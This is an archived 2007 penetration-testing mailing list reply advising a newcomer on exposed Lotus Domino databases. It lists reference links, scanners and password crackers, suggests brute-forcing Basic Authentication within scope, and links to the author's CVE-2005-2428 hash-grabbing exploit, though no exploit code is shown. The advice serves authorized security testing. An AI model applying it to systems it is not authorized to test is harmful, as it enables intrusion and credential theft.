Penetration Testing mailing list archives
Re: Domino testing
From: Marco Ivaldi <raptor () mediaservice net>
Date: Mon, 23 Jul 2007 15:21:55 +0200 (ora solare Europa occidentale)
Hey, On Fri, 20 Jul 2007, A Plasmoid wrote:
I'm new to Domino testing, and have found a few interesting databases. I am wondering if there is anything that could be done with them.Specifically, there are: cldbdir.nsf
This is the Cluster Directory: obvious information leak.
dba4.nsf
Beside the obvious information leak due to unrestricted access to the Database Analysis feature itself, there seems to be a file disclosure vulnerability affecting dba4.nsf, though i've not been able to find more details (see http://www.eeye.com/html/Products/Retina/RTHs/Web_Servers/).
You may try to check IBM's changelog and fix lists for anything mentioning a security vulnerability on dba4.nsf.
qstart.nsf
Quick Start: i don't see any immediate security implications, but the golden rule of "disable all unused/unneded stuff" should be applied.
/sample/faqw46.nsf /sample/pagesw46.nsf (several others in sample) /help/help5_designer.nsf (several others in help)
See above.
The ?EditDocument functionality is locked down with "basic authentication" but I can view them.There is not a lot of info (that I have found) regarding domino, so I'm hoping that some kind person here can tell me whether these things can be leveraged into a deeper level of access or not.
Here are some interesting resources about Lotus Domino/Notes security that may help in your task:
http://www.dominosecurity.org/ http://www.ngssoftware.com/papers/hpldws.pdf http://www.fortconsult.net/images/pdf/lotusnotes_keyfiles.pdf http://seclists.org/pen-test/2002/Nov/0034.html (all thread) http://documents.iss.net/whitepapers/domino.pdf http://www-128.ibm.com/developerworks/views/lotus/library.jsp http://www-128.ibm.com/developerworks/lotus/security/ http://www.redbooks.ibm.com/redbooks/pdfs/sg247017.pdf http://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg245341.pdf And some testing tools: http://packetstormsecurity.org/UNIX/scanners/DominoHunter-0.92.zip http://packetstormsecurity.org/UNIX/scanners/domino.tar.gz http://www.cqure.net/wp/?page_id=17 http://www.appsecinc.com/products/appdetective/domino/ (commercial!) http://www.rapid7.com/nexpose/features.jsp (commercial!) http://www.openwall.com/john http://usuarios.lycos.es/reinob/ http://www.nestonline.com/lcrack/ http://www.securiteinfo.com/download/dhb.zip http://www.cqure.net/wp/?page_id=12 Other commercial password crackers from Elcomsoft/Passware/etc.
All of the other "important" databases like names.nsf, webadmin.nsf, and others are also protected with basic auth.
If compatible with scope and legal agreement, you should try to brute force the Basic Authentication to get access to the protected databases and functionalities. Some manual password guessing also doesn't hurt;)
If you're ultimately able to get access to names.nsf, you may use my CVE-2005-2428 exploit to grab all password hashes:
http://www.0xdeadbeef.info/exploits/raptor_dominohash
Thanks for any hints, clues, and even "Google is your friend" stuff (as long as there is a corresponding reasonable search parameter ) :)
Hope this helps, -- Marco Ivaldi, OPST Chief Security Officer Data Security Division @ Mediaservice.net Srl http://mediaservice.net/ ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Domino testing A Plasmoid (Jul 20)
- Re: Domino testing Marco Ivaldi (Jul 23)
- Re: Domino testing Daniele Bellucci (Jul 23)
- <Possible follow-ups>
- Re: Domino testing A Plasmoid (Jul 23)